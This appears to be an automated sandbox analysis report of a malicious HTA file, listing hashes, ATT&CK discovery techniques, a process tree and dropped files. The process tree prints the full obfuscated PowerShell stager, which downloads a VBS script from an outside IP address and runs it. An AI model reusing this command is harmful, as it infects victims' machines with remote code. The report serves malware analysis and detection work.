d4ceed54c4c40a1ab8e3dc310e96ad94aa5bb7e65269cac051d974257fb44e90

General

Target

seethebestthingswithgreatthingshrewithme.hta
Size

205KB
MD5

d50fd6f65b574b2c9ca393cbd44ecf11
SHA1

1f2126c711c25c4104cf34d42316db0cf8b50d89
SHA256

d4ceed54c4c40a1ab8e3dc310e96ad94aa5bb7e65269cac051d974257fb44e90
SHA512

c91cf64044091d7bef8c05e19e28b0c1403960d0944d96e4f68da241b36bfac1689aae6d07356721853a732ee919abe5d1686baf6625f58d5802110e390b20d8
SSDEEP

96:43F97tMfPVMXbfrrFAQGFYIO7QpOMPMKtbMxQ:43F1tiV2VAQTt8NNcQ

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
4540	PowErSHell.Exe
2604	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PowErSHell.Exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
4540	PowErSHell.Exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4540	PowErSHell.Exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2956 wrote to memory of 4540	2956	mshta.exe	87
PID 2956 wrote to memory of 4540	2956	mshta.exe	87
PID 2956 wrote to memory of 4540	2956	mshta.exe	87

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgreatthingshrewithme.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2956
- C:\Windows\SysWOW64\wiNDowsPowERsHEll\V1.0\PowErSHell.Exe
  "C:\Windows\sysTem32\wiNDowsPowERsHEll\V1.0\PowErSHell.Exe" "POWErSheLl.exe -eX BYPAsS -nOp -w 1 -C deVIcECREdEnTiaLDeplOyMENt.exE ; IEx($(IeX('[sYstEM.TEXT.ENCoDInG]'+[chAr]0x3A+[CHar]0x3a+'Utf8.gETSTriNG([SystEM.ConvERT]'+[chAr]58+[ChaR]58+'fROmBAsE64sTRiNg('+[CHar]34+'JHpiejRLVXlZczhPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFZmlOaXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGdnUFl2VVgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERSVixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPUEMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6enFhc29aYnUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1PdEZ0dW1mTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkemJ6NEtVeVlzOE86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc1LjEzMC4zNi8xMjAvcGljdHVyZXdpdGhncmVhdHRoaW5nc2dvb2RpZGVhcGxhbm5pbmdmb3IudElGIiwiJGVOdjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nnb29kaWRlYXBsYW5uaW5nLnZicyIsMCwwKTtTVGFSVC1zTEVFcCgzKTtTVEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdHRoaW5nc2dvb2RpZGVhcGxhbm5pbmcudmJzIg=='+[ChAr]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4540
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX BYPAsS -nOp -w 1 -C deVIcECREdEnTiaLDeplOyMENt.exE
    3⤵
    - Evasion via Device Credential Deployment
    PID:2604
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5e3yvw3b\5e3yvw3b.cmdline"
    3⤵
    PID:4384
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB508.tmp" "c:\Users\Admin\AppData\Local\Temp\5e3yvw3b\CSCF0D61C70A3644386B5FA67D09331CEA7.TMP"
      4⤵
      PID:1320

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5e3yvw3b\5e3yvw3b.dll

Filesize
3KB

MD5
926a48be239584c4d9d9d09f3ffd2afb

SHA1
277aa84d1e223c915b8cf3f8ee199e03efcc447a

SHA256
64d901abbd8364125993cb263ea5fb7fee6bb737c9a3466303bad8e460267aa9

SHA512
cbef73354e17790c356717e08f61dffc73690d59f68f16df0db82e2a093ada83b6d4b131502c308a2f3fdf14cbd6ef0b842810f0ac1ad58d4f25b726a95f1b2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB508.tmp

Filesize
1KB

MD5
225cee4fced4bad56a06656979f4b96c

SHA1
eb8c1c5562007e5e58a4e7f4e41461259a28fe90

SHA256
920104bf30ccffcf5bb0d027e686a305e60fc0f05a766dc68cfd382597e322c7

SHA512
662899fbcc9ccd4fd22ea5cf3adda604015543d1992d681f7b2dd3cf561f32a1900028f3e00f14f806eece1e685c57a20fcdb86994c708e295af1a522568899d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xplafiqc.bxi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5e3yvw3b\5e3yvw3b.0.cs

Filesize
469B

MD5
f89c3daa6416168719346d97618dab89

SHA1
291029ed13418eefcd0902435ecac1b3caeb61f2

SHA256
0ae5932bfd2ff3ff3a4522cf176bc41a9062d1e981d01a73e9e8a72664423b0d

SHA512
9a8ebe03128f7fbc0c5adf8d76060d7f9b1a7d4319f0cdc0af64ca80e0eba34c6c91796d1f04f044b1c1a4ec5d30a9dcf57aa662ed138f9f3f983d915216cb55

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5e3yvw3b\5e3yvw3b.cmdline

Filesize
369B

MD5
8b27367cfce54f71b7904b94df589961

SHA1
2409421f78312da25ab5f64245b00b3837661c05

SHA256
5c17dd1fb365f85d1b36ecd303f7e2eedcd8fffa06c7d981d7417c041a889edc

SHA512
79597aa28dc4e6df1ce1e79f307ce210081a52ae498d223abd6bebafa2913c77cfe66506c957a66b258112a859a5fb1f7a969eb100fe6c14a7ebdf23c3147fcc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5e3yvw3b\CSCF0D61C70A3644386B5FA67D09331CEA7.TMP

Filesize
652B

MD5
2cbb4f727045612ee2af2c5dd279f795

SHA1
c7a18e6d6d5308e219c6b55465074a8ab2a0d7ee

SHA256
515f1a94c498b55e1f9e565bbba4561242c7c8725485ced08209450459c21af7

SHA512
5aae545f8f1d676962632335eddd1ba0a9a9a34d685db92b7359652dabc20a3d8bbabd0421a0cb6f93147004d14aa5403629a5cc36b673dfdccdd4c7cafc828b

Download Submit
memory/2604-43-0x0000000007880000-0x000000000789A000-memory.dmp

Filesize
104KB

Download
memory/2604-45-0x0000000007D20000-0x0000000007DB6000-memory.dmp

Filesize
600KB

Download
memory/2604-49-0x0000000007DE0000-0x0000000007DFA000-memory.dmp

Filesize
104KB

Download
memory/2604-50-0x0000000007D10000-0x0000000007D18000-memory.dmp

Filesize
32KB

Download
memory/2604-48-0x0000000007CD0000-0x0000000007CE4000-memory.dmp

Filesize
80KB

Download
memory/2604-47-0x0000000007CC0000-0x0000000007CCE000-memory.dmp

Filesize
56KB

Download
memory/2604-40-0x0000000006D00000-0x0000000006D1E000-memory.dmp

Filesize
120KB

Download
memory/2604-41-0x0000000007770000-0x0000000007813000-memory.dmp

Filesize
652KB

Download
memory/2604-30-0x000000006E000000-0x000000006E04C000-memory.dmp

Filesize
304KB

Download
memory/2604-29-0x0000000007730000-0x0000000007762000-memory.dmp

Filesize
200KB

Download
memory/2604-46-0x0000000007C90000-0x0000000007CA1000-memory.dmp

Filesize
68KB

Download
memory/2604-42-0x0000000008170000-0x00000000087EA000-memory.dmp

Filesize
6.5MB

Download
memory/2604-44-0x0000000007AF0000-0x0000000007AFA000-memory.dmp

Filesize
40KB

Download
memory/4540-5-0x00000000057F0000-0x0000000005812000-memory.dmp

Filesize
136KB

Download
memory/4540-17-0x0000000005A20000-0x0000000005D74000-memory.dmp

Filesize
3.3MB

Download
memory/4540-19-0x00000000060B0000-0x00000000060FC000-memory.dmp

Filesize
304KB

Download
memory/4540-18-0x0000000006000000-0x000000000601E000-memory.dmp

Filesize
120KB

Download
memory/4540-6-0x0000000005940000-0x00000000059A6000-memory.dmp

Filesize
408KB

Download
memory/4540-7-0x00000000059B0000-0x0000000005A16000-memory.dmp

Filesize
408KB

Download
memory/4540-0-0x000000007174E000-0x000000007174F000-memory.dmp

Filesize
4KB

Download
memory/4540-4-0x0000000071740000-0x0000000071EF0000-memory.dmp

Filesize
7.7MB

Download
memory/4540-3-0x0000000071740000-0x0000000071EF0000-memory.dmp

Filesize
7.7MB

Download
memory/4540-65-0x00000000065B0000-0x00000000065B8000-memory.dmp

Filesize
32KB

Download
memory/4540-2-0x0000000005100000-0x0000000005728000-memory.dmp

Filesize
6.2MB

Download
memory/4540-1-0x0000000002700000-0x0000000002736000-memory.dmp

Filesize
216KB

Download
memory/4540-67-0x000000007174E000-0x000000007174F000-memory.dmp

Filesize
4KB

Download
memory/4540-68-0x0000000071740000-0x0000000071EF0000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing